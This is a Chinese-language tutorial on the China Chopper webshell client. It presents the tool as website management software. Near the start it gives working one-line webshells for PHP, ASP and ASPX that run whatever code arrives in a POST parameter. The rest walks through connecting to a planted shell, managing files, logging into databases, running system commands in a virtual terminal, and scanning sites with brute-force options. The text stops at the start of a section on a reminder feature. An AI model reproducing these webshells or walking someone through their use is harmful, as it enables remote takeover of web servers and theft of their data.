中國菜刀使用簡介

 

0x01 介紹

中國菜刀是一款專業的網站管理軟件，用途普遍，使用方便，小巧實用。只要支持動態腳本的網站，均可以用中國菜刀來進行管理！在非簡體中文環境下使用，自動切換到英文界面。UINCODE方式編譯，支持多國語言輸入顯示。(引用於百度百科中國菜刀_百度百科)

菜刀的界面：

 

 

0x02 使用

1.常見的管理

右鍵空白處->添加

 

 

添加SHELL -> 進行相關的配置。

 

 

個人配置：

地址：http://localhost/a.php

密碼：key

腳本類型：PHP

最後->點擊添加

相關的介紹：

這裏的WEBSHELL是咱們常說的一句話木馬：

PHP一句話木馬：<?php @eval($_POST['key']);?>

ASP一句話木馬：<%eval request['key']%>

ASPX一句話木馬：<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>

眼尖的童鞋已經看到了三個裏面都帶有key這個單詞，沒錯這個就是密碼，你們能夠自行修改成本身使用的密碼。

功能概述：

 

 

文件管理：

打開方式 [右鍵WEBSHELL->單擊文件管理]

 

 

管理方式 [右鍵上圖中方框內的任何區域進行管理]

 

數據庫管理：

打開方式 [右鍵WEBSHELL->數據庫管理]

 

能夠看到是空白的，這時候就須要配置數據庫信息了。

配置方式1.[單擊配置]

 

出現了一個配置窗口。(前提你要有網站數據庫的配置信息才能夠進行配置)

個人配置信息：

數據庫類型：Mysql

用戶名：root

密碼：root

配置方式 2.[選擇數據庫]

 

 

能夠看到紅色方框那邊有MYSQL、MSSQL、MSSQL二、ORACLE等數據庫類型。

我是Mysql的就選擇mysql的示例：

 

 

配置後 [單擊提交]：

 

管理方式：

 

虛擬終端：

打開方式 [右鍵WEBSHELL->單擊虛擬終端]

 

紅色方框裏是系統的一些信息。咱們在D:\WWW\>後面輸入相應的cmd命令便可(Linux就輸入shell命令)

2.網站掃描

打開方式 [單擊菜刀圖標->單擊網站掃描]

 

(也能夠在軟件裏使用快捷鍵Alt+K去打開)

 

使用方法：

把http://www.http://maicaidao.com替換成本身的測試站點便可。

功能：

1.反向IP(reverse_ip)

2.爬蟲(spider)

3.爆破(crack)

其餘按照這些提示都應該能懂就不一一去說了。

3.瀏覽器功能

 

打開方法如上圖示意。

 

對着網頁進行右擊：

 

 

上圖是一些瀏覽器方面的功能。

單擊擴展功能:

 

能夠進行cookie的修改。

同時也能夠單擊菜刀圖標->瀏覽器：

 

能夠進行選擇：

#表明開啓 能夠單擊進行取消開啓。

4.其餘功能

第一：設置菜刀啓動密碼(防止本身的WEBSHELL泄露出去)

 

打開方式 [單擊菜刀圖標->單擊設置啓動密碼]

 

點擊是，就成功設置密碼爲test。

而後咱們關掉菜刀再打開菜刀：

輸入咱們的密碼再能夠設置新的密碼：

 

我相信着點英語難不倒各位也不解釋了。

也能夠把啓動密碼取消掉：

 

 

第二：日程提醒，使用方法以下：